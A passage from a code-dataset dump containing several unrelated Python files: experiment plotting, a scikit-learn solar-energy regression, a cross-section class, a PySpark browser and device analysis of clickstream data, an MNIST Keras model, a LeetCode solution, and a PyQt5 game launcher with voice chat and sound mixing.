self._check_results()\n self._create_directory()\n \n row_results, random_nan_results, col_results = self.results\n row_results.to_csv(os.path.join(self.base_dir, \"row_results.csv\"))\n random_nan_results.to_csv(os.path.join(self.base_dir, \"random_nan_results.csv\"))\n col_results.to_csv(os.path.join(self.base_dir, \"col_results.csv\"))\n \n with open(os.path.join(self.base_dir, \"konfiguration.json\"), \"w\") as file:\n json.dump(arguments, file)\n return self.results \n \n def debug_plot(self, time: Union[str, int]):\n self.set_result_path(time)\n col_results = pd.read_csv(os.path.join(self.base_dir, \"col_results.csv\"), index_col=0)\n row_results = pd.read_csv(os.path.join(self.base_dir, \"row_results.csv\"), index_col=0)\n random_nan_results = pd.read_csv(os.path.join(self.base_dir, \"random_nan_results.csv\"), index_col=0)\n self.results = row_results, random_nan_results, col_results\n self.plot()\n \n @staticmethod\n def reverse_remove(df):\n max_value = df['remove'].max() + 1\n df['remove'] = abs(df['remove'] - max_value)\n return df\n \n def plot(self):\n self._check_results()\n self._create_directory()\n sns.color_palette(\"tab10\")\n row_results, random_nan_results, col_results = self.results\n \n max_row = pd.DataFrame({\n \"dataset\": row_results[\"dataset\"].unique(),\n \"remove\": [1.0] * len(row_results[\"dataset\"].unique()),\n \"coverage\": [0.0] * len(row_results[\"dataset\"].unique())\n })\n row_results = row_results.append(max_row)\n random_nan_results = random_nan_results.append(max_row)\n\n col_results = col_results.groupby([\"remove\", \"dataset\"])[\"coverage\"].mean().reset_index()\n col_results = col_results.groupby(\"dataset\").apply(self.reverse_remove)\n min_row = pd.DataFrame({\n \"dataset\": row_results[\"dataset\"].unique(),\n \"remove\": [0] * len(row_results[\"dataset\"].unique()),\n \"coverage\": [1.0] * len(row_results[\"dataset\"].unique())\n })\n col_results = col_results.append(min_row)\n col_results = col_results.rename(columns={\"coverage\": \"Rule Coverage\", \"remove\": \"Removed Columns\", \"dataset\": \"Dataset\"})\n sns.lineplot(\n data=col_results,\n x=\"Removed Columns\",\n y=\"Rule Coverage\",\n hue=\"Dataset\",\n marker=\"o\"\n )\n plt.ylim(0, 1.1)\n self._save_plot(os.path.join(self.base_dir, f\"rule_coverage_col_removal.png\"))\n \n row_result = row_results.groupby([\"remove\", \"dataset\"])[\"coverage\"].mean().reset_index()\n row_result = row_result.rename(columns={\"coverage\": \"Rule Coverage\", \"remove\": \"Removed Tuples (in \\%)\", \"dataset\": \"Dataset\"})\n 
sns.lineplot(\n data=row_result,\n x=\"Removed Tuples (in \\%)\",\n y=\"Rule Coverage\",\n hue=\"Dataset\",\n marker=\"o\"\n )\n plt.ylim(0, 1.1)\n self._save_plot(os.path.join(self.base_dir, f\"rule_coverage_tuple_removal.png\"))\n \n random_nan_results = random_nan_results.groupby([\"remove\", \"dataset\"])[\"coverage\"].mean().reset_index()\n random_nan_results = random_nan_results.rename(columns={\"coverage\": \"Rule Coverage\", \"remove\": \"nan-Cells (in \\%)\", \"dataset\": \"Dataset\"})\n sns.lineplot(\n data=random_nan_results,\n x=\"nan-Cells (in \\%)\",\n y=\"Rule Coverage\",\n hue=\"Dataset\",\n marker=\"o\"\n )\n plt.ylim(0, 1.1)\n self._save_plot(os.path.join(self.base_dir, f\"rule_coverage_cell_removal.png\"))","repo_name":"S-Eggers/MA-Cleaning-Data-Lakes-in-a-Self-Supervised-Manner","sub_path":"experiments/rule_reusage_suite.py","file_name":"rule_reusage_suite.py","file_ext":"py","file_size_in_byte":5181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25125035000","text":"from timeit import default_timer as timer\nimport pandas as pd\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsRegressor\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import GridSearchCV, RandomizedSearchCV, train_test_split, PredefinedSplit\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.svm import SVR\nfrom sklearn.metrics import mean_absolute_error, mean_absolute_percentage_error\nfrom dask_ml.wrappers import ParallelPostFit\n\n\nnp.random.seed(100465934)\ntrain = pd.read_pickle('trainst1ns16.pkl')\ntest = pd.read_pickle('testst1ns16.pkl')\ntrain_close, test_close = train.iloc[:,0:75], test.iloc[:,0:75]\n\n##### split 10 years train and 2 year val ########\nx_train, x_val, y_train, y_val = train_test_split(train_close.values,pd.Series(train['energy']),train_size=365*10)\n\n##### train models ############\nscalar = StandardScaler().fit(x_val)\nx_val_st = scalar.transform(x_val)\n\n# Predefined Val Split\nvalidation_indices = np.zeros(y_train.shape[0])\nvalidation_indices[:round(3/4*y_train.shape[0])] = -1\nvalidation_split = PredefinedSplit(validation_indices)\n\n#### Defaulted Models\n# knn\nscalar = StandardScaler()\nknn = KNeighborsRegressor()\nknnPipiLineDef = Pipeline([\n ('standartization',scalar),\n ('model', knn)\n ])\nknnPipiLineDef.fit(x_train,y_train)\n\n\n# Deision tree\nscalar = StandardScaler()\ndt = DecisionTreeRegressor()\ndtPipiLineDef = Pipeline([\n ('standartization',scalar),\n ('model', dt)\n ])\ndtPipiLineDef.fit(x_train,y_train)\n\n# svm\nscalar = StandardScaler()\nsvr = SVR()\nsvrPipiLineDef = Pipeline([\n ('standartization',scalar),\n ('model', svr)\n ])\nsvrPipiLineDef.fit(x_train,y_train)\n\n########################################## DASK ######################################\n#### Non Defaulted Defaulted Models\n# knn (Evri, using dask we were able to run the model in 20-40 % less, check ParallelPostFit)\n# knn\nprint('\\nKNN\\n')\nscalar = StandardScaler()\nknn = ParallelPostFit(KNeighborsRegressor())\nknnPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', knn)\n ])\ngdSearchKnn = GridSearchCV(knnPipiLine\n , {'model__estimator__n_neighbors':[1,2,3,4,5,6,7,8]}\n , cv = validation_split\n , refit=False\n , error_score='raise'\n , scoring='neg_mean_absolute_error')\n\nstart = timer()\ngdSearchKnn.fit(x_train,y_train)\ntrain_patched = timer() - start\nprint(f\"time for KNN: {train_patched:.2f} 
s\")\nprint('KNN best hyperparameters: ', gdSearchKnn.best_params_)\n\nprint('\\nDT\\n')\n# Deision tree\ndt = ParallelPostFit(DecisionTreeRegressor())\ndtPipiLine = Pipeline([\n ('model', dt)\n ])\ngdSearchDt = RandomizedSearchCV(dtPipiLine\n , {'model__estimator__max_depth':[2, 5, 10, 30, 75, 100]\n , 'model__estimator__min_samples_split': [2, 5, 10, 20, 50]\n , 'model__estimator__max_features': ['auto','sqrt']\n , 'model__estimator__min_samples_leaf': [2,4,10]\n }\n , cv = validation_split\n , refit=False\n , scoring='neg_mean_absolute_error'\n )\n\nstart = timer()\ngdSearchDt.fit(x_train,y_train)\ntrain_patched = timer() - start\nprint(f\"time for DT: {train_patched:.2f} s\")\nprint('DT best hyperparameters: ', gdSearchDt.best_params_)\n\nprint('\\nSVM\\n')\n# svm\nscalar = StandardScaler()\nsvr = ParallelPostFit(SVR())\nsvrPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', svr)\n ])\ngdSearchSvr = RandomizedSearchCV(svrPipiLine\n , {'model__estimator__C':[1,2,3,4]\n ,'model__estimator__kernel': ['linear', 'poly', 'rbf', 'sigmoid', 'precomputed']\n }\n , cv = validation_split\n , refit=False\n , scoring='neg_mean_absolute_error'\n )\n\nstart = timer()\ngdSearchSvr.fit(x_train,y_train)\ntrain_patched = timer() - start\nprint(f\"time for SVR: {train_patched:.2f} s\")\nprint('SVR best hyperparameters: ', gdSearchSvr.best_params_)\n\n######### Re-fiting the models with the best params ##########\nknn = ParallelPostFit(KNeighborsRegressor(n_neighbors=gdSearchKnn.best_params_['model__estimator__n_neighbors']))\nknnPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', knn)\n ])\nknnPipiLine.fit(x_train,y_train)\n\nDT = ParallelPostFit(DecisionTreeRegressor(min_samples_split = gdSearchDt.best_params_['model__estimator__min_samples_split']\n , min_samples_leaf = gdSearchDt.best_params_['model__estimator__min_samples_leaf']\n , max_features= gdSearchDt.best_params_['model__estimator__max_features']\n , max_depth = gdSearchDt.best_params_['model__estimator__max_depth']))\nDtPipiLine = Pipeline([\n ('model', DT)\n ])\nDtPipiLine.fit(x_train,y_train)\n\nsvr = ParallelPostFit(SVR(kernel = gdSearchSvr.best_params_['model__estimator__kernel']\n , C = gdSearchSvr.best_params_['model__estimator__C']))\nSvrPipiLine = Pipeline([\n ('standartization',scalar),\n ('model', svr)\n ])\nSvrPipiLine.fit(x_train,y_train)\n\n######## Models Comparison #####################\nprint('\\nDeafult result')\nprint('KNN Default MAE: ', round(mean_absolute_error(y_val, knnPipiLineDef.predict(x_val_st)), 4))\nprint('DT Default MAE: ', round(mean_absolute_error(y_val, dtPipiLineDef.predict(x_val)), 4))\nprint('SVR Default MAE: ', round(mean_absolute_error(y_val, svrPipiLineDef.predict(x_val_st)), 4))\nprint('\\nHyperparameter optimization modeled result')\nprint('KNN MAE: ', round(mean_absolute_error(y_val, knnPipiLine.predict(x_val_st)), 4))\nprint('DT MAE: ', round(mean_absolute_error(y_val, DtPipiLine.predict(x_val)), 4))\nprint('SVR MAE: ', round(mean_absolute_error(y_val, SvrPipiLine.predict(x_val_st)), 4))\n\n######## DT regressor the best model\nx = train.iloc[:, 0:75]\ny = train.iloc[:, -1]\nfinal_DT = ParallelPostFit(DecisionTreeRegressor(min_samples_split = gdSearchDt.best_params_['model__estimator__min_samples_split']\n , min_samples_leaf = gdSearchDt.best_params_['model__estimator__min_samples_leaf']\n , max_features= gdSearchDt.best_params_['model__estimator__max_features']\n , max_depth = gdSearchDt.best_params_['model__estimator__max_depth']))\nDtFinalPipiLine = Pipeline([\n ('model', 
final_DT)\n ])\nDtFinalPipiLine.fit(x,y)\nx_test = test.iloc[:, 0:75]\ny_test = test.iloc[:, -1]\nprint('DT MAE: ', round(mean_absolute_error(y_test, DtFinalPipiLine.predict(x_test)), 4))\nprint('DT MAPE: ', round(mean_absolute_percentage_error(y_test, DtFinalPipiLine.predict(x_test)), 4))","repo_name":"yanirkes/solarEnergyPrediction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16108445611","text":"from py2md.classes import MDTable\nfrom ..general.generalsection import GeneralSection\nfrom .. import config\n\nclass CircleSection(GeneralSection):\n d: float = None\n\n def __init__(self, d: float, label: str=None) -> None:\n self.d = d\n radius = self.d/2\n y = [radius, -radius, -radius, radius]\n z = [radius, radius, -radius, -radius]\n r = [radius, radius, radius, radius]\n super().__init__(y, z, r, label=label)\n\n def _repr_markdown_(self) -> str:\n mdstr = self.section_heading('Circle-Section')\n table = MDTable()\n table.add_column(f'd ({config.lunit:s})',\n config.l1frm, data=[self.d])\n mdstr += table._repr_markdown_()\n mdstr += self.section_properties(outtype='md')\n return mdstr\n\n def __str__(self) -> str:\n outstr = self.section_heading('Circle-Section')\n table = MDTable()\n table.add_column(f'd ({config.lunit:s})',\n config.l1frm, data=[self.d])\n outstr += table.__str__()\n outstr += self.section_properties(outtype='str')\n return outstr\n\n def __repr__(self) -> str:\n if self.label is None:\n outstr = ''\n else:\n outstr = f''\n return outstr\n","repo_name":"Xero64/pysectprop","sub_path":"pysectprop/standard/circlesection.py","file_name":"circlesection.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22996085517","text":"import sys\n\nvalores = []\ncontador = 1\nNOME_ARQUIVO = sys.argv[1]\nNOME_ARQUIVO_SPLIT = NOME_ARQUIVO.split('.')[0]\n\nwith open(NOME_ARQUIVO) as f:\n for line in f:\n if len(line.split()) > 1 and line.split()[1] == \"\\\"============================\\\"\":\n filename = \"{}_house_{}.txt\".format(NOME_ARQUIVO_SPLIT, contador)\n del valores[-1]\n with open(filename, 'w') as g:\n for value in valores:\n g.write(\"{}\\n\".format(value))\n print(\"casa {}\".format(contador))\n contador += 1\n else:\n valores.append(line)\n# print(line)\n","repo_name":"carvalhodj/tcc_bsi_ufrpe","sub_path":"software/resultado/line_python.py","file_name":"line_python.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"999272259","text":"# -*- coding: utf-8 -*-\n'''\nCreated on Thu Feb 6 20:32:52 2020\n\n@author: aadityabhatia\n\nInfo:\n This spark script gets the most common browsers and devices used at coursera\n Data is based on the clicking behaviour of the user.\n A parsing tool, DeviceDetector is used. 
Can be installed by: \"pip install device_detector\"\n\nPrerequisites:\n The clicks.text file is to be converted into a csv file for the purpose of optimization.\n The equivalent csv file is used because it consumes less disk volume (from 2GB to ~300mb).\n The data is present at Hadoop Distributed File System (i.e., hdfs:///user/....)\n \nTasks Performed:\n A third party tool, \"DeviceDetector\" is used to parse the user agent string to get the corresponding browser and device values for each click.\n To prevent double counting of results, duplicate users using the same Device and browser are removed.\n Getting the top browsers: \n 1. The number of browsers used by each user are grouped together to get their count. \n 2. Count of browsers is ordered in descending fashion to get the top most browsers used.\n 3. The results are saved in a csv file.\n \n Getting the top browsers: \n 1. The number of devices used by each user are grouped together to get their count. \n 2. Count of devices is ordered in descending fashion to get the top most devices used.\n 3. The results are saved in a csv file.\n'''\n\n\nfrom pyspark.sql.types import StringType\nfrom pyspark.sql.functions import udf\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql import Row\nfrom pyspark.sql import functions\nfrom pyspark.sql import SQLContext\nfrom user_agents import parse\n'''This function splits string to get the language of the course\nWe get the overall language (eg, English or Turkish, instead of tu-en, i.e., turkish-english)'''\n\ndef getUserAgentBrowserDevice(string):\n ua = parse(string)\n return str(ua.os.family) +';'+ str(ua.device.family)\n\ndef splitBrowser(string):\n return string.split(\";\")[0]\n\ndef splitDevice(string):\n return string.split(\";\")[1]\n\n \nif __name__ == \"__main__\":\n # defining the directories where data is to be loaded/stored\n dirName = \"hdfs:///user/maria_dev/Coursera/\"\n datFile = dirName+\"data_reduced.csv\"\n \n # creating a spark session\n spark = SparkSession.builder.appName(\"ClairvoyantTest\").getOrCreate()\n \n # creating a spark context from the spark session\n sc = spark.sparkContext\n \n # creating a sql context from the spark context\n # this is done to load the data using the sql context\n sqlContext = SQLContext(sc)\n \n # reading the csv file\n df = sqlContext.read.format('csv').options(header='true', inferschema='true').load(datFile)\n \n # just checking if the load is proper, and map-reduce is working in the system\n print(df.columns)\n df.collect() \n \n \n \n #Getting the top browsers and :\n print(\"\\n\\nGetting the top Browsers and Devices \")\n \n #creating a user defined functions for spark\n # this uses the parser to get both browser and device info\n udf_getBrowserDevice = udf(getUserAgentBrowserDevice, StringType())\n df2 = df.withColumn(\"browserNdevice\", udf_getBrowserDevice(\"user_agent\"))\n \n #remove the same users who use the same device and browsers\n df2 = df2.select('browserNdevice', 'username').drop_duplicates()\n \n # this splits the browser and device info into only browser info\n udf_getBrowser = udf(splitBrowser, StringType())\n df3 = df2.withColumn(\"browser\", udf_getBrowser(\"browserNdevice\"))\n\n # this splits the browser and device info to only device info\n udf_getDevice = udf(splitDevice, StringType())\n df4 = df3.withColumn(\"device\", udf_getDevice(\"browserNdevice\"))\n \n # process \n df4.collect()\n print(df4.columns)\n \n '''getting the top browsers'''\n # group by count, then order by descending value of count \n 
sub_df = df4.select('username', 'browser')\n    topBrowsers = sub_df.groupby('browser').count().orderBy('count', ascending = False)\n    # printing the top 10 browsers to validate the result\n    topTen = topBrowsers.take(10)\n    for i in topTen:\n        print (i[0], i[1])\n    # saving the results \n    #topBrowsers.coalesce(1).write.csv(dirName+'topBrowsers', header=True)\n    \n    \n    '''\n    getting the top devices'''\n    # group by count, then order by descending value of count \n    sub_df = df4.select('username', 'device')\n    topdevices = sub_df.groupby('device').count().orderBy('count', ascending = False)\n    # printing the top 10 devices to validate the result\n    topTen = topdevices.take(10)\n    for i in topTen:\n        print (i[0], i[1])\n    # saving the results \n    #topdevices.coalesce(1).write.csv(dirName+'topdevices', header=True)\n\n    # exiting the spark session\n    spark.stop()","repo_name":"Aaditya-Bhatia/Courseara_BigData_clickstream_analytics_pySpark_Hadoop","sub_path":"Scripts/SparkAnalyze_Browser_&_Device.py","file_name":"SparkAnalyze_Browser_&_Device.py","file_ext":"py","file_size_in_byte":4856,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27752113114","text":"from __future__ import print_function\n##### set specific gpu #####\nimport os\nos.environ[\"CUDA_DEVICE_ORDER\"]=\"PCI_BUS_ID\"\nos.environ[\"CUDA_VISIBLE_DEVICES\"]=\"1\"\nimport warnings\nwarnings.filterwarnings('ignore')\nimport tensorflow as tf\n##### \nphysical_devices = tf.config.experimental.list_physical_devices('GPU')\nassert len(physical_devices) > 0, \"Not enough GPU hardware devices available\"\ntf.config.experimental.set_memory_growth(physical_devices[0], True)\ntf.compat.v1.disable_eager_execution()\n\nimport tensorflow.keras as keras\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPooling2D\nfrom tensorflow.keras import backend as K\n\nbatch_size = 128\nnum_classes = 10\nepochs = 10\n\n# input image dimensions\nimg_rows, img_cols = 28, 28\n\n# the data, split between train and test sets\n(x_train, y_train), (x_test, y_test) = tf.keras.datasets.mnist.load_data()\n\n# get the channel dimension\nx_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\nx_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\ninput_shape = (img_rows, img_cols, 1)\n\nx_train = x_train.astype('float32')\nx_test = x_test.astype('float32')\nx_train /= 255\nx_test /= 255\nprint('x_train shape:', x_train.shape)\nprint(x_train.shape[0], 'train samples')\nprint(x_test.shape[0], 'test samples')\n\n# convert class vectors to binary class matrices\ny_train = keras.utils.to_categorical(y_train, num_classes)\ny_test = keras.utils.to_categorical(y_test, num_classes)\n\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n                 activation='relu',\n                 input_shape=input_shape))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.5))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n              optimizer=keras.optimizers.Adam(),\n              metrics=['accuracy'])\n\nmodel.fit(x_train, y_train,\n          batch_size=batch_size,\n          epochs=epochs,\n          verbose=1,\n          validation_data=(x_test, y_test))\nmodel.save(\"mnist_keras.h5\")\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', 
score[1])","repo_name":"CSI5138-2019Fall/CSI_5138_project_2019Fall","sub_path":"pre_trained_models/mnist_keras.py","file_name":"mnist_keras.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33340198251","text":"class Solution:\n def countSubarrays(self, nums: List[int], minK: int, maxK: int) -> int:\n minInd, maxInd = None, None\n left = 0\n res = 0\n for right in range(len(nums)):\n if minK <= nums[right] <= maxK:\n if nums[right] == minK:\n minInd = right\n if nums[right] == maxK:\n maxInd = right\n if minInd != None and maxInd != None:\n res += min(minInd, maxInd) - left + 1\n else:\n left = right + 1\n minInd, maxInd = None, None\n return res","repo_name":"natitedros/Competitive-Programming","sub_path":"Daily Questions/2444CountSubarraysWithFixedBounds.py","file_name":"2444CountSubarraysWithFixedBounds.py","file_ext":"py","file_size_in_byte":619,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"70932808874","text":"__author__= \"\"\"\r\n░░░░███████ ]▄▄▄▄▄▄▄▄\r\n▂▄▅█████████▅▄▃▂\r\nIl███████████████████].\r\n ◥⊙▲⊙▲⊙▲⊙▲⊙▲⊙▲⊙◤..\"\"\"\r\n\r\nfrom PyQt5.QtCore import pyqtProperty, QRectF, QUrl, QObject, pyqtSignal, pyqtSlot, QVariant, QTimer, QThread, QEvent\r\nfrom PyQt5.QtGui import QColor, QGuiApplication, QPainter, QPen\r\nfrom PyQt5.QtQml import qmlRegisterType\r\nfrom PyQt5.QtQuick import QQuickItem, QQuickView\r\nfrom PyQt5 import QtNetwork as QN\r\nfrom PyQt5 import QtCore as QC\r\n\r\n\r\nfrom multiprocessing import Process, Manager, freeze_support\r\nimport pyaudio\r\nimport numpy as np\r\nimport wave\r\nimport time\r\nimport win_unicode_console\r\n\r\nfrom store import Buffer\r\nimport server as S\r\nimport client as C\r\nimport game\r\n\r\nwin_unicode_console.enable()\r\n\r\nclass Sound(QObject):\r\n\r\n sendVoice = pyqtSignal(bytes, int)\r\n\r\n\r\n WIDTH = 2\r\n CHANNELS = 2\r\n RATE = 44100\r\n\r\n MAX_INC = 255\r\n MAX_VOICE = 10\r\n\r\n def __init__(self, parent = None):\r\n super(Sound, self).__init__(parent)\r\n self.voiceStreams= (Buffer(), Buffer(), Buffer(), Buffer(), Buffer(), Buffer()) #6x pro šest hráčů\r\n self.musicStreams = [wave.open(\"Music\\Paranoia.wav\", \"rb\"), wave.open(\"Music\\RightBehindYou.wav\", \"rb\"), wave.open(\"Music\\ParanormalActivity.wav\", \"rb\")]\r\n self.effectStreams= []\r\n\r\n self.vVolume= 1\r\n self.mVolume= 1\r\n self.eVolume= 1\r\n\r\n self.voip = None\r\n\r\n self.p = pyaudio.PyAudio()\r\n self.stream = self.p.open(format = self.p.get_format_from_width(Sound.WIDTH),\r\n channels = Sound.CHANNELS,\r\n rate = Sound.RATE,\r\n input = True,\r\n output = True,\r\n #stream_callback = self.callback\r\n )\r\n\r\n\r\n self.nextSample = \"\"\r\n self.lastSample = \"\"\r\n\r\n self.stream.start_stream()\r\n\r\n def addMusic(self, name):\r\n self.musicStreams.append(wave.open(name, \"rb\"))\r\n\r\n def addVoice(self, player, increment, voice):\r\n \"\"\"\r\n :param player: od jakého hráče\r\n :param increment: kolikátá stopa (max MAX_INC)\r\n :param voice: vzorek hlasu\r\n Přidá do self.voiceStreams[player] zvukovou stopu v podobě (increment, voice)\r\n Pokud zjistí, že předchozí stopa má menší increment, zařadí se před ní\r\n Pokud má seznam vzorků u jednoho hráče větší délku než MAX_VOICE tak se první člen odstraní (tím se kontroluje maximální délka zpoždění hlasu)\r\n \"\"\"\r\n data = np.fromstring(voice, np.int16)\r\n self.voiceStreams[player].add(increment, 
data)\r\n\r\n\r\n def addEffect(self, name):\r\n self.effectStreams.append(wave.open(name, \"rb\"))\r\n\r\n def newVVolume(self, v):\r\n self.vVolume = v\r\n\r\n def newMVolume(self, v):\r\n self.mVolume = v\r\n\r\n def newEVolume(self, v):\r\n self.eVolume = v\r\n\r\n def run(self):\r\n self.increment = 0\r\n while True:\r\n self.myCallback()\r\n self.increment += 1\r\n if self.increment > self.MAX_INC: self.increment = 0\r\n\r\n def myCallback(self):\r\n _time = time.clock()\r\n if self.nextSample:\r\n self.stream.write(self.nextSample) #Pošlu zvuk do reproduktorů\r\n self.lastSample = self.nextSample\r\n elif self.lastSample: # This is dead\r\n self.stream.write(self.lastSample)\r\n self.lastSample = \"\"\r\n _time = time.clock()\r\n #print (\"{0:d} ---- {1:d} --- timeWrite: {2:.1f}\".format(6 - self.voiceStreams.count([]) , self.stream.get_read_available(), (time.clock() - _time)* 1000) , end = \" \")\r\n\r\n if self.stream.get_read_available() > 1023:\r\n mic = self.stream.read(1024)\r\n else:\r\n mic = \"\"\r\n #print (\"timeRead: {0:.1f}\".format( (time.clock() - _time)* 1000) , end = \" \")\r\n\r\n if mic: self.sendVoice.emit(mic, self.increment) #Pošlu data z mikrofonu serveru\r\n\r\n _time = time.clock()\r\n data = np.zeros(2048, np.int64)\r\n\r\n length = 0 #Přeču data z VOIP serveru\r\n for v in self.voiceStreams:\r\n if v: length += 1\r\n l1 = length\r\n for v in self.voiceStreams:\r\n sample = v.get()\r\n if sample is not Buffer.DEFAULT:\r\n data += sample / length * self.vVolume * 0.4\r\n\r\n if self.musicStreams: #Přečtu vzorek zvukové stopy hudby\r\n wf = self.musicStreams[0]\r\n konec = int((wf.getnframes() - wf.tell() ) / 1024)\r\n if (konec) < 250: #Novou hudbu začnu přehrávat 250 CHUNKů před koncem poslední hudby\r\n\r\n if konec == 0: #Jsem na konci\r\n self.musicStreams.append(self.musicStreams.pop(0)) #Přesunu stopu na konec\r\n wf.rewind()\r\n frames = self.musicStreams[0].readframes(1024)\r\n s = np.fromstring(frames, np.int16) * self.mVolume * 0.3\r\n\r\n else:\r\n s0 = (np.fromstring(wf.readframes(1024), np.int16) / (250 - konec)) * self.mVolume * 0.3\r\n if len(s0) > 2047:\r\n data += s0\r\n frames = self.musicStreams[1].readframes(1024) #Je potřeba mít alespoň dvě stopy hudby\r\n s = (np.fromstring(frames, np.int16) / (konec)) * self.mVolume * 0.3\r\n\r\n else:\r\n frames = wf.readframes(1024)\r\n s = np.fromstring(frames, np.int16) * self.mVolume * 0.3\r\n data += s\r\n\r\n length = len(self.effectStreams) #Přečtu vzorky zvukových stop efektů\r\n toPop= []\r\n for i in range(length):\r\n s = self.effectStreams[i].readframes(1024)\r\n if s == \"\":\r\n toPop.append(i - len(toPop))\r\n else:\r\n d = np.fromstring(s, np.int16)\r\n if len(d) > 2047:\r\n data += (d/ length * length) * self.eVolume * 0.3\r\n\r\n for i in toPop:\r\n del self.effectStreams[i]\r\n\r\n if np.any(data):\r\n self.nextSample = data.astype(np.int16).tostring() #Připravím si stopu pro čtení\r\n else:\r\n self.nextSample = data.astype(np.int16).tostring()\r\n\r\n\r\n #print (\"timeRest: {0:.1f}\".format( (time.clock() - _time)* 1000), end = \" || \")\r\n #print(\"HOW MANY CHUNKS OF VOICE I GOT: \", l1)\r\n\r\n\r\n def close(self):\r\n self.timer.stop()\r\n self.stream.stop_stream()\r\n self.stream.close()\r\n\r\n self.p.terminate()\r\n\r\n\r\nclass Launcher(QQuickItem):\r\n PORTS = (9998, 9999)\r\n PORT = 9999\r\n SIZEOF_UINT32 = 4\r\n\r\n\r\n playersChanged = pyqtSignal()\r\n @pyqtProperty(QVariant, notify= playersChanged)\r\n def players(self):\r\n return self._players\r\n\r\n namesChanged 
= pyqtSignal()\r\n    @pyqtProperty(QVariant, notify= namesChanged)\r\n    def names(self):\r\n        return self._names\r\n\r\n    serverNameChanged = pyqtSignal()\r\n    @pyqtProperty(str, notify= serverNameChanged)\r\n    def serverName(self):\r\n        return self._serverName\r\n\r\n    @serverName.setter\r\n    def serverName(self, name):\r\n        self.client.sendMessage(\"jmeno_serveru\", (name, ))\r\n\r\n    meChanged = pyqtSignal()\r\n    @pyqtProperty(int, notify=meChanged)\r\n    def me(self):\r\n        return self._me\r\n\r\n    @pyqtProperty(QVariant)\r\n    def write(self):\r\n        return \"a\"\r\n\r\n    @write.setter\r\n    def write(self, text):\r\n        text= text.toVariant()\r\n        print (\" // QML: \", text)\r\n\r\n\r\n    @pyqtSlot()\r\n    def _start(self):\r\n        self.client.sendMessage(\"spust_hru\", ())\r\n\r\n    @pyqtSlot(float, float, float)\r\n    def _changeVolume(self, voip, music, effect):\r\n        self.sound.vVolume = voip\r\n        self.sound.mVolume = music\r\n        self.sound.eVolume = effect\r\n\r\n    @pyqtSlot(str)\r\n    def _connectTo(self, adresa):\r\n\r\n        self.client.connectToServer(adresa)\r\n        if self.client.socket.waitForConnected(3000):\r\n            #print (\"Připojeno\")\r\n\r\n            self.voip = C.VOIP(adresa)\r\n            self.voip.newMessage.connect(self.addVoice)\r\n            self.sound.sendVoice.connect(self.voip.writeDatagram)\r\n            self.client.sendMessage(\"zmen_jmeno\", (QN.QHostInfo.localHostName(),))\r\n\r\n\r\n    @pyqtSlot()\r\n    def _createServer(self):\r\n        if not self.server:\r\n            self.server = Process(target = S.run, args = (False, ))\r\n            self.server.daemon = True\r\n            self.server.start()\r\n            #self.bstopServer.setEnabled(True)\r\n            #self.bserver.setEnabled(False)\r\n\r\n        self.client.connectToServer(\"127.0.0.1\")\r\n\r\n        if self.client.socket.waitForConnected(3000):\r\n            #print (\"Pripojeno\")\r\n\r\n            self.voip = C.VOIP(\"127.0.0.1\")\r\n            self.voip.newMessage.connect(self.addVoice)\r\n            self.sound.sendVoice.connect(self.voip.writeDatagram)\r\n            self.client.sendMessage(\"zmen_jmeno\", (QN.QHostInfo.localHostName(),))\r\n\r\n    disconnected = pyqtSignal()\r\n    @pyqtSlot()\r\n    def _disconnect(self):\r\n        #print(\"REFERENCE: \", sys.getrefcount(self.game))\r\n        self.game = None\r\n        if view.gWindow: view.gWindow.close()\r\n        self.nScanThread.start()\r\n        self.disconnected.emit()\r\n        self.sound.voip = None\r\n        self.voip.close()\r\n\r\n        if not self.server: return\r\n        self.server.terminate() #Bye\r\n        self.server.join()\r\n        self.server = None\r\n\r\n    @pyqtSlot()\r\n    def _quit(self):\r\n        if self.server:\r\n            self.server.terminate() #Just to be safe\r\n            self.server.join()\r\n        app.exit()\r\n\r\n\r\n    setVolume = pyqtSignal(float, float, float)\r\n    addVoice = pyqtSignal(int, int, bytes)\r\n    addMusic = pyqtSignal(str)\r\n    addEffect = pyqtSignal(str)\r\n    @pyqtSlot()\r\n    def _completed(self):\r\n        self.client.closed.connect(self._disconnect)\r\n        self.addVoice.connect(self.resendVoice)\r\n        self.addMusic.connect(self.sound.addMusic)\r\n        self.addEffect.connect(self.sound.addEffect)\r\n        self.setVolume.emit(self.sound.vVolume, self.sound.mVolume, self.sound.eVolume)\r\n\r\n    @pyqtSlot()\r\n    def _hoverButton(self):\r\n        pass 